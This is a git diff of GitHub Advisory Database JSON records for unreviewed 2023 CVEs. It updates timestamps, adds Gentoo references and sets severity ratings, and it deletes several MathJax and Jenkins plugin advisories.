diff --git a/advisories/unreviewed/2023/08/GHSA-pgwm-pcfw-q4v8/GHSA-pgwm-pcfw-q4v8.json b/advisories/unreviewed/2023/08/GHSA-pgwm-pcfw-q4v8/GHSA-pgwm-pcfw-q4v8.json index d8bb6080f77f4..ecf6ecadd06b8 100644 --- a/advisories/unreviewed/2023/08/GHSA-pgwm-pcfw-q4v8/GHSA-pgwm-pcfw-q4v8.json +++ b/advisories/unreviewed/2023/08/GHSA-pgwm-pcfw-q4v8/GHSA-pgwm-pcfw-q4v8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pgwm-pcfw-q4v8", - "modified": "2023-08-22T18:31:31Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4363" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:13Z" diff --git a/advisories/unreviewed/2023/08/GHSA-prm9-8h85-6m44/GHSA-prm9-8h85-6m44.json b/advisories/unreviewed/2023/08/GHSA-prm9-8h85-6m44/GHSA-prm9-8h85-6m44.json index 74e6a1a3efe8f..0728f07a74dc3 100644 --- a/advisories/unreviewed/2023/08/GHSA-prm9-8h85-6m44/GHSA-prm9-8h85-6m44.json +++ b/advisories/unreviewed/2023/08/GHSA-prm9-8h85-6m44/GHSA-prm9-8h85-6m44.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-prm9-8h85-6m44", - "modified": "2023-08-04T06:30:19Z", + "modified": "2024-01-31T18:31:18Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3733" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:32Z" diff --git a/advisories/unreviewed/2023/08/GHSA-q56g-qr28-qh57/GHSA-q56g-qr28-qh57.json b/advisories/unreviewed/2023/08/GHSA-q56g-qr28-qh57/GHSA-q56g-qr28-qh57.json index 5ff40a66c3020..a1b02dbb0c3e5 100644 --- a/advisories/unreviewed/2023/08/GHSA-q56g-qr28-qh57/GHSA-q56g-qr28-qh57.json +++ b/advisories/unreviewed/2023/08/GHSA-q56g-qr28-qh57/GHSA-q56g-qr28-qh57.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q56g-qr28-qh57", - "modified": "2023-08-17T21:30:53Z", + "modified": "2024-02-02T18:30:24Z", "published": "2023-08-17T21:30:53Z", "aliases": [ "CVE-2023-36845" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176969/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html" } ], "database_specific": { "cwe_ids": [ "CWE-473" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-17T20:15:10Z" diff --git a/advisories/unreviewed/2023/08/GHSA-q839-jfph-q4wx/GHSA-q839-jfph-q4wx.json b/advisories/unreviewed/2023/08/GHSA-q839-jfph-q4wx/GHSA-q839-jfph-q4wx.json index b2f78e35879b2..5a7a231f45b44 100644 --- a/advisories/unreviewed/2023/08/GHSA-q839-jfph-q4wx/GHSA-q839-jfph-q4wx.json +++ b/advisories/unreviewed/2023/08/GHSA-q839-jfph-q4wx/GHSA-q839-jfph-q4wx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q839-jfph-q4wx", - "modified": "2023-08-25T15:32:39Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-23T00:30:26Z", "aliases": [ "CVE-2023-4431" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5483" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-125" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-23T00:15:09Z" diff --git a/advisories/unreviewed/2023/08/GHSA-qc3g-vp59-7vwh/GHSA-qc3g-vp59-7vwh.json b/advisories/unreviewed/2023/08/GHSA-qc3g-vp59-7vwh/GHSA-qc3g-vp59-7vwh.json index e972d78aa041c..3470c7f40e4bb 100644 --- a/advisories/unreviewed/2023/08/GHSA-qc3g-vp59-7vwh/GHSA-qc3g-vp59-7vwh.json +++ b/advisories/unreviewed/2023/08/GHSA-qc3g-vp59-7vwh/GHSA-qc3g-vp59-7vwh.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5467" diff --git a/advisories/unreviewed/2023/08/GHSA-qgcm-f4w9-q77h/GHSA-qgcm-f4w9-q77h.json b/advisories/unreviewed/2023/08/GHSA-qgcm-f4w9-q77h/GHSA-qgcm-f4w9-q77h.json index 1d04b3f7b8548..7c958ec0bb54b 100644 --- a/advisories/unreviewed/2023/08/GHSA-qgcm-f4w9-q77h/GHSA-qgcm-f4w9-q77h.json +++ b/advisories/unreviewed/2023/08/GHSA-qgcm-f4w9-q77h/GHSA-qgcm-f4w9-q77h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qgcm-f4w9-q77h", - "modified": "2023-08-24T06:30:16Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4358" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:12Z" diff --git a/advisories/unreviewed/2023/08/GHSA-qj69-r8v9-pg55/GHSA-qj69-r8v9-pg55.json b/advisories/unreviewed/2023/08/GHSA-qj69-r8v9-pg55/GHSA-qj69-r8v9-pg55.json index 44ad63669d899..8e78d984f760c 100644 --- a/advisories/unreviewed/2023/08/GHSA-qj69-r8v9-pg55/GHSA-qj69-r8v9-pg55.json +++ b/advisories/unreviewed/2023/08/GHSA-qj69-r8v9-pg55/GHSA-qj69-r8v9-pg55.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qj69-r8v9-pg55", - "modified": "2023-08-22T18:31:31Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4367" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:13Z" diff --git a/advisories/unreviewed/2023/08/GHSA-qqwc-fhxf-4mf3/GHSA-qqwc-fhxf-4mf3.json b/advisories/unreviewed/2023/08/GHSA-qqwc-fhxf-4mf3/GHSA-qqwc-fhxf-4mf3.json index 8a72bde1101d1..847a3aea7e311 100644 --- a/advisories/unreviewed/2023/08/GHSA-qqwc-fhxf-4mf3/GHSA-qqwc-fhxf-4mf3.json +++ b/advisories/unreviewed/2023/08/GHSA-qqwc-fhxf-4mf3/GHSA-qqwc-fhxf-4mf3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qqwc-fhxf-4mf3", - "modified": "2023-08-28T21:31:06Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-23T00:30:26Z", "aliases": [ "CVE-2023-4427" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5483" @@ -54,7 +58,7 @@ "cwe_ids": [ "CWE-125" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-23T00:15:09Z" diff --git a/advisories/unreviewed/2023/08/GHSA-qv79-48vx-52fw/GHSA-qv79-48vx-52fw.json b/advisories/unreviewed/2023/08/GHSA-qv79-48vx-52fw/GHSA-qv79-48vx-52fw.json index 45e9090c0be3f..8cd8c8a8bbc6c 100644 --- a/advisories/unreviewed/2023/08/GHSA-qv79-48vx-52fw/GHSA-qv79-48vx-52fw.json +++ b/advisories/unreviewed/2023/08/GHSA-qv79-48vx-52fw/GHSA-qv79-48vx-52fw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qv79-48vx-52fw", - "modified": "2023-08-08T15:33:39Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-08-03T00:30:15Z", "aliases": [ "CVE-2023-1437" @@ -31,7 +31,7 @@ "CWE-119", "CWE-822" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-02T23:15:10Z" diff --git a/advisories/unreviewed/2023/08/GHSA-qxc5-q732-v8v7/GHSA-qxc5-q732-v8v7.json b/advisories/unreviewed/2023/08/GHSA-qxc5-q732-v8v7/GHSA-qxc5-q732-v8v7.json index a51a792e4ec69..8855eab759552 100644 --- a/advisories/unreviewed/2023/08/GHSA-qxc5-q732-v8v7/GHSA-qxc5-q732-v8v7.json +++ b/advisories/unreviewed/2023/08/GHSA-qxc5-q732-v8v7/GHSA-qxc5-q732-v8v7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qxc5-q732-v8v7", - "modified": "2023-08-24T06:30:16Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4359" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:12Z" diff --git a/advisories/unreviewed/2023/08/GHSA-r43m-48vw-xgp3/GHSA-r43m-48vw-xgp3.json b/advisories/unreviewed/2023/08/GHSA-r43m-48vw-xgp3/GHSA-r43m-48vw-xgp3.json index 35c91f5d841a9..7e4cc493f6fbd 100644 --- a/advisories/unreviewed/2023/08/GHSA-r43m-48vw-xgp3/GHSA-r43m-48vw-xgp3.json +++ b/advisories/unreviewed/2023/08/GHSA-r43m-48vw-xgp3/GHSA-r43m-48vw-xgp3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r43m-48vw-xgp3", - "modified": "2023-08-25T15:32:39Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-23T00:30:26Z", "aliases": [ "CVE-2023-4429" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5483" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-23T00:15:09Z" diff --git a/advisories/unreviewed/2023/08/GHSA-r8pr-cp2m-9q75/GHSA-r8pr-cp2m-9q75.json b/advisories/unreviewed/2023/08/GHSA-r8pr-cp2m-9q75/GHSA-r8pr-cp2m-9q75.json index fe5c2aa23f76e..405fbb5eeb3ff 100644 --- a/advisories/unreviewed/2023/08/GHSA-r8pr-cp2m-9q75/GHSA-r8pr-cp2m-9q75.json +++ b/advisories/unreviewed/2023/08/GHSA-r8pr-cp2m-9q75/GHSA-r8pr-cp2m-9q75.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r8pr-cp2m-9q75", - "modified": "2023-08-21T18:31:23Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4356" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:12Z" diff --git a/advisories/unreviewed/2023/08/GHSA-rq4v-7hxq-wpm5/GHSA-rq4v-7hxq-wpm5.json b/advisories/unreviewed/2023/08/GHSA-rq4v-7hxq-wpm5/GHSA-rq4v-7hxq-wpm5.json index 9e87d3d001c1e..4d726e6bb8591 100644 --- a/advisories/unreviewed/2023/08/GHSA-rq4v-7hxq-wpm5/GHSA-rq4v-7hxq-wpm5.json +++ b/advisories/unreviewed/2023/08/GHSA-rq4v-7hxq-wpm5/GHSA-rq4v-7hxq-wpm5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rq4v-7hxq-wpm5", - "modified": "2023-08-21T18:31:23Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4354" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-787" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:11Z" diff --git a/advisories/unreviewed/2023/08/GHSA-v638-q856-grg8/GHSA-v638-q856-grg8.json b/advisories/unreviewed/2023/08/GHSA-v638-q856-grg8/GHSA-v638-q856-grg8.json deleted file mode 100644 index 3b364b1ca735a..0000000000000 --- a/advisories/unreviewed/2023/08/GHSA-v638-q856-grg8/GHSA-v638-q856-grg8.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-v638-q856-grg8", - "modified": "2023-08-31T21:32:38Z", - "published": "2023-08-29T21:30:21Z", - "aliases": [ - "CVE-2023-39663" - ], - "details": "Mathjax up to v2.7.9 was discovered to contain two Regular expression Denial of Service (ReDoS) vulnerabilities in MathJax.js via the components pattern and markdownPattern.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39663" - }, - { - "type": "WEB", - "url": "https://github.com/mathjax/MathJax/issues/3074" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-1333" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-08-29T20:15:09Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/08/GHSA-vp8r-986v-6qj4/GHSA-vp8r-986v-6qj4.json b/advisories/unreviewed/2023/08/GHSA-vp8r-986v-6qj4/GHSA-vp8r-986v-6qj4.json index 5f96d727574f5..d8dd3ecbe2708 100644 --- a/advisories/unreviewed/2023/08/GHSA-vp8r-986v-6qj4/GHSA-vp8r-986v-6qj4.json +++ b/advisories/unreviewed/2023/08/GHSA-vp8r-986v-6qj4/GHSA-vp8r-986v-6qj4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vp8r-986v-6qj4", - "modified": "2023-08-21T18:31:23Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4352" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-843" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:11Z" diff --git a/advisories/unreviewed/2023/08/GHSA-w8hm-59h4-7ff2/GHSA-w8hm-59h4-7ff2.json b/advisories/unreviewed/2023/08/GHSA-w8hm-59h4-7ff2/GHSA-w8hm-59h4-7ff2.json index 5acf8bdf1330c..6c45a452a0666 100644 --- a/advisories/unreviewed/2023/08/GHSA-w8hm-59h4-7ff2/GHSA-w8hm-59h4-7ff2.json +++ b/advisories/unreviewed/2023/08/GHSA-w8hm-59h4-7ff2/GHSA-w8hm-59h4-7ff2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w8hm-59h4-7ff2", - "modified": "2023-08-25T00:31:57Z", + "modified": "2024-02-08T21:30:33Z", "published": "2023-08-22T21:30:25Z", "aliases": [ "CVE-2020-21469" @@ -38,7 +38,7 @@ "cwe_ids": [ "CWE-120" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-22T19:16:13Z" diff --git a/advisories/unreviewed/2023/08/GHSA-wh89-h5f7-hhcr/GHSA-wh89-h5f7-hhcr.json b/advisories/unreviewed/2023/08/GHSA-wh89-h5f7-hhcr/GHSA-wh89-h5f7-hhcr.json index 98534cc512c8d..eda8d44154372 100644 --- a/advisories/unreviewed/2023/08/GHSA-wh89-h5f7-hhcr/GHSA-wh89-h5f7-hhcr.json +++ b/advisories/unreviewed/2023/08/GHSA-wh89-h5f7-hhcr/GHSA-wh89-h5f7-hhcr.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5467" diff --git a/advisories/unreviewed/2023/08/GHSA-x2x8-ph79-9fqc/GHSA-x2x8-ph79-9fqc.json b/advisories/unreviewed/2023/08/GHSA-x2x8-ph79-9fqc/GHSA-x2x8-ph79-9fqc.json index a8db4869c2519..536d63a8028f4 100644 --- a/advisories/unreviewed/2023/08/GHSA-x2x8-ph79-9fqc/GHSA-x2x8-ph79-9fqc.json +++ b/advisories/unreviewed/2023/08/GHSA-x2x8-ph79-9fqc/GHSA-x2x8-ph79-9fqc.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5467" diff --git a/advisories/unreviewed/2023/08/GHSA-xrw8-8992-37w4/GHSA-xrw8-8992-37w4.json b/advisories/unreviewed/2023/08/GHSA-xrw8-8992-37w4/GHSA-xrw8-8992-37w4.json index 0420c7eb5e1c1..2f3feb0da054f 100644 --- a/advisories/unreviewed/2023/08/GHSA-xrw8-8992-37w4/GHSA-xrw8-8992-37w4.json +++ b/advisories/unreviewed/2023/08/GHSA-xrw8-8992-37w4/GHSA-xrw8-8992-37w4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xrw8-8992-37w4", - "modified": "2023-08-21T18:31:23Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4355" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-787" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:11Z" diff --git a/advisories/unreviewed/2023/08/GHSA-xwc7-4px3-fqx8/GHSA-xwc7-4px3-fqx8.json b/advisories/unreviewed/2023/08/GHSA-xwc7-4px3-fqx8/GHSA-xwc7-4px3-fqx8.json index 045b14f33af3c..c400950859b6f 100644 --- a/advisories/unreviewed/2023/08/GHSA-xwc7-4px3-fqx8/GHSA-xwc7-4px3-fqx8.json +++ b/advisories/unreviewed/2023/08/GHSA-xwc7-4px3-fqx8/GHSA-xwc7-4px3-fqx8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xwc7-4px3-fqx8", - "modified": "2023-08-05T06:30:59Z", + "modified": "2024-01-31T18:31:18Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3738" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:33Z" diff --git a/advisories/unreviewed/2023/09/GHSA-2747-7gmp-qm3g/GHSA-2747-7gmp-qm3g.json b/advisories/unreviewed/2023/09/GHSA-2747-7gmp-qm3g/GHSA-2747-7gmp-qm3g.json index 2f1a527b3d916..a15841b2fe478 100644 --- a/advisories/unreviewed/2023/09/GHSA-2747-7gmp-qm3g/GHSA-2747-7gmp-qm3g.json +++ b/advisories/unreviewed/2023/09/GHSA-2747-7gmp-qm3g/GHSA-2747-7gmp-qm3g.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5491" diff --git a/advisories/unreviewed/2023/09/GHSA-2hcr-79rm-r8rp/GHSA-2hcr-79rm-r8rp.json b/advisories/unreviewed/2023/09/GHSA-2hcr-79rm-r8rp/GHSA-2hcr-79rm-r8rp.json index 5025a83b6c1bd..258d2dfb595e8 100644 --- a/advisories/unreviewed/2023/09/GHSA-2hcr-79rm-r8rp/GHSA-2hcr-79rm-r8rp.json +++ b/advisories/unreviewed/2023/09/GHSA-2hcr-79rm-r8rp/GHSA-2hcr-79rm-r8rp.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EYRHTFVN6FTXLZ27IPTNRSXKBAR2SOMA/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT213926" diff --git a/advisories/unreviewed/2023/09/GHSA-3vcr-579j-4x48/GHSA-3vcr-579j-4x48.json b/advisories/unreviewed/2023/09/GHSA-3vcr-579j-4x48/GHSA-3vcr-579j-4x48.json deleted file mode 100644 index c1517a4c3a1c9..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-3vcr-579j-4x48/GHSA-3vcr-579j-4x48.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3vcr-579j-4x48", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41940" - ], - "details": "Jenkins TAP Plugin 2.3 and earlier does not escape TAP file contents, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control TAP file contents.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41940" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3190" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:11Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-3wjr-p76q-rg8q/GHSA-3wjr-p76q-rg8q.json b/advisories/unreviewed/2023/09/GHSA-3wjr-p76q-rg8q/GHSA-3wjr-p76q-rg8q.json index c173a0ddbf471..1157c1a54d129 100644 --- a/advisories/unreviewed/2023/09/GHSA-3wjr-p76q-rg8q/GHSA-3wjr-p76q-rg8q.json +++ b/advisories/unreviewed/2023/09/GHSA-3wjr-p76q-rg8q/GHSA-3wjr-p76q-rg8q.json @@ -53,6 +53,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5491" diff --git a/advisories/unreviewed/2023/09/GHSA-4gh2-m88h-8cj8/GHSA-4gh2-m88h-8cj8.json b/advisories/unreviewed/2023/09/GHSA-4gh2-m88h-8cj8/GHSA-4gh2-m88h-8cj8.json deleted file mode 100644 index da8a5a0c61ebf..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-4gh2-m88h-8cj8/GHSA-4gh2-m88h-8cj8.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-4gh2-m88h-8cj8", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41939" - ], - "details": "Jenkins SSH2 Easy Plugin 1.4 and earlier does not verify that permissions configured to be granted are enabled, potentially allowing users formerly granted (typically optional permissions, like Overall/Manage) to access functionality they're no longer entitled to.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41939" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3064" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:10Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-5jxp-f5rr-g6jc/GHSA-5jxp-f5rr-g6jc.json b/advisories/unreviewed/2023/09/GHSA-5jxp-f5rr-g6jc/GHSA-5jxp-f5rr-g6jc.json deleted file mode 100644 index a472fc8c7c3e3..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-5jxp-f5rr-g6jc/GHSA-5jxp-f5rr-g6jc.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5jxp-f5rr-g6jc", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41931" - ], - "details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not property sanitize or escape the timestamp value from history entries when rendering a history entry on the history view, resulting in a stored cross-site scripting (XSS) vulnerability.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41931" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3233" - }, - { - "type": "WEB", - "url": 